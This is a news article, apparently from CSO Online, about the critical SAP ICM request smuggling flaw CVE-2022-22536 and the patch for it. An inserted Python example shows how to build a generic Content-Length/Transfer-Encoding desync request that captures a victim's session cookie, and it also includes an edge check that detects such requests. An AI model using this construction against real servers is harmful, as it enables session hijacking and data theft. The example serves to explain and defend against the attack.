


By Michael Hill, UK Editor

Major SAP vulnerability requires urgent patch to prevent HTTP request smuggling attacks

Feb 11, 2022 | 2 mins
Enterprise Applications, Vulnerabilities

SAP ICM vulnerability allows theft of credentials and session information, which can be used to launch ransomware and steal sensitive data.


Security researchers, enterprise software maker SAP, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued warnings over a critical vulnerability in Internet Communication Manager (ICM), the core component of SAP business applications that handles their HTTP and HTTPS communication. Tracked as CVE-2022-22536 and rated CVSS 10.0, the vulnerability lets an unauthenticated attacker send crafted HTTP requests that trick SAP servers into exposing sensitive data, according to Onapsis Research Labs. A security patch is available and organizations are urged to apply it as soon as possible.

Exploitation possible via simple HTTP request

In a report, Onapsis stated that the vulnerability can be exploited via an attack known as HTTP request smuggling, which can be used to steal credentials and session information from unpatched SAP servers even when those servers sit behind proxies. “A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation,” it added.
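The article does not go into the parsing details of the ICM flaw, and the following added example does not reproduce them; it is not code from Onapsis, SAP or CSO. It shows the generic shape of an HTTP request smuggling attack in Python: a front-end that frames requests by Content-Length and a back-end that frames by Transfer-Encoding: chunked are fed the same constructed byte stream, and the back-end ends up parsing the victim's request, session cookie included, as the body of an attacker-chosen request. The host sap.example, the /comment and /account paths and the SAP_SESSIONID value are all made up for the illustration, and is_ambiguous_framing is a hypothetical edge-side check, not an SAP setting.

```python
"""Generic HTTP request smuggling (CL.TE desync), constructed example.

A front-end that trusts Content-Length and a back-end that honours
Transfer-Encoding: chunked frame the same byte stream differently, so the
back-end treats attacker-supplied bytes as the start of the next request
and swallows the victim's request (cookie included) into an attacker body.
Hostnames, paths and the token are made up; this is not the ICM flaw itself.
"""


def _split_head(raw: bytes):
    """Return (request_line, lower-cased headers, remainder), or None if incomplete."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def frame_by_content_length(stream: bytes):
    """Front-end view: Content-Length alone decides where each body ends."""
    requests = []
    while (parsed := _split_head(stream)) is not None:
        request_line, headers, rest = parsed
        length = int(headers.get(b"content-length", b"0"))
        requests.append((request_line, rest[:length]))
        stream = rest[length:]
    return requests


def frame_by_chunked(stream: bytes):
    """Back-end view: Transfer-Encoding: chunked takes precedence."""
    requests = []
    while (parsed := _split_head(stream)) is not None:
        request_line, headers, rest = parsed
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            body = b""
            while True:
                size_line, _, rest = rest.partition(b"\r\n")
                size = int(size_line.split(b";")[0].strip(), 16)
                body += rest[:size]
                rest = rest[size + 2:]  # drop the chunk and its trailing CRLF
                if size == 0:
                    break
        else:
            # A real server would block until `length` bytes arrive; here the
            # stream is shorter than that, so the body is simply what is left.
            length = int(headers.get(b"content-length", b"0"))
            body, rest = rest[:length], rest[length:]
        requests.append((request_line, body))
        stream = rest
    return requests


def is_ambiguous_framing(raw: bytes) -> bool:
    """Hypothetical edge check: a message carrying both Content-Length and
    Transfer-Encoding has no single length and should be rejected, not forwarded."""
    parsed = _split_head(raw)
    return (parsed is not None
            and b"content-length" in parsed[1]
            and b"transfer-encoding" in parsed[1])


# Attacker bytes the back-end will read as a fresh request. Content-Length is
# deliberately larger than "text=" so the next client's request is absorbed.
SMUGGLED_PREFIX = (
    b"POST /comment HTTP/1.1\r\nHost: sap.example\r\n"
    b"Content-Length: 200\r\n\r\ntext="
)


def build_attacker_request() -> bytes:
    """Outer request: Content-Length spans the whole body (front-end forwards it
    whole); the zero chunk ends it early for the chunked back-end."""
    body = b"0\r\n\r\n" + SMUGGLED_PREFIX
    head = (
        b"POST / HTTP/1.1\r\nHost: sap.example\r\n"
        b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n"
    ) % len(body)
    return head + body


# Constructed victim request; the session token is a placeholder, not real data.
VICTIM_REQUEST = (
    b"GET /account HTTP/1.1\r\nHost: sap.example\r\n"
    b"Cookie: SAP_SESSIONID=constructed-example-token\r\n\r\n"
)

STREAM = build_attacker_request() + VICTIM_REQUEST

if __name__ == "__main__":
    print("front-end sees:", [line for line, _ in frame_by_content_length(STREAM)])
    print("back-end sees: ", [line for line, _ in frame_by_chunked(STREAM)])
    print("cookie in attacker body:", b"SAP_SESSIONID" in frame_by_chunked(STREAM)[1][1])
    print("reject at edge:", is_ambiguous_framing(STREAM))
```

Run it directly to print both views of the same stream. The rule is_ambiguous_framing encodes is the one RFC 7230 section 3.3.3 already states: a message with both Content-Length and Transfer-Encoding is a smuggling indicator and ought to be treated as an error. Enforcing it on a reverse proxy in front of SAP is a useful defence-in-depth measure, but it is not a substitute for the SAP patch, since the reported issue is in ICM's own handling of requests.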

A post on SAP’s website confirmed the severity of the issue, which was announced alongside two other, less severe SAP vulnerabilities tracked as CVE-2022-22532 and CVE-2022-22533. “If your organization’s program was exploited, these vulnerabilities, a.k.a. ‘ICMAD,’ will enable attackers to execute serious malicious activity on SAP users, business information, and processes,” SAP said.

Security patch available, ransomware and data theft among exploit risks

SAP released a security patch for CVE-2022-22536 on February 9, and while the firm stated it is not aware of any related customer breaches, businesses should update SAP applications as soon as possible given how widely the vulnerable component is deployed and how readily it can be exploited. “As we have observed through recent threat intelligence, threat actors are actively targeting business-critical applications like SAP and have the expertise and tools to carry out sophisticated attacks,” commented Mariano Nunez, Onapsis CEO and co-founder.

CISA warned that impacted organizations could experience theft of sensitive data, financial fraud, disruption of mission-critical business processes, ransomware, and a halt of operations if targeted.


Michael Hill is the UK editor of CSO Online. He has spent the past 8 years covering various aspects of the cybersecurity industry, with particular interest in the ever-evolving role of the human-related elements of information security. A keen storyteller with a passion for the publishing process, he enjoys working creatively to produce media that has the biggest possible impact on the audience.
